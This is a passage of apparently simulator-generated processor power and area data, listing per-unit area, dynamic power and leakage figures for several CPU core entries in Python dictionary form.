'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.275459,
'Execution Unit/Register Files/Runtime Dynamic': 0.0886661,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296874,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.691131,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.35765,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000376894,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000376894,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000329837,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00012854,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00112199,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00220561,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00355779,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0750845,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.77602,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178011,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.255021,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.22632,
'Instruction Fetch Unit/Runtime Dynamic': 0.513879,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.045595,
'L2/Runtime Dynamic': 0.00877062,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.58398,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.13583,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0759266,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0759266,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.94252,
'Load Store Unit/Runtime Dynamic': 1.5862,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.187222,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.374444,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0664457,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0671173,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.296955,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0292213,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.567206,
'Memory Management Unit/Runtime Dynamic': 0.0963386,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.8877,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.396406,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.016184,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.120258,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.532848,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.09569,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.179236,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.343469,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.997388,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.308416,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.497463,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.251103,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.05698,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199824,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.95449,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.188428,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0129363,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.159451,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0956722,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.347879,
'Execution Unit/Register Files/Runtime Dynamic': 0.108609,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.380738,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.805977,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.72041,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000651223,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000651223,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000569303,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000221529,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00137434,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00324609,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00616923,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0919721,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.85021,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.20347,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.312379,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.35265,
'Instruction Fetch Unit/Runtime Dynamic': 0.617236,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0466842,
'L2/Runtime Dynamic': 0.00644507,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.40524,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04453,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0701438,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0701439,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.73647,
'Load Store Unit/Runtime Dynamic': 1.4606,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.172963,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.345926,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.061385,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0620814,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.363745,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0333701,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.625302,
'Memory Management Unit/Runtime Dynamic': 0.0954515,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.3051,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.495668,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.019947,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.146459,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.662073,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.56222,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.209512,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.367249,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.15216,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.343277,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.553693,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.279486,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.17646,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.215969,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.26383,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.217667,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0143986,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.181715,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.106486,
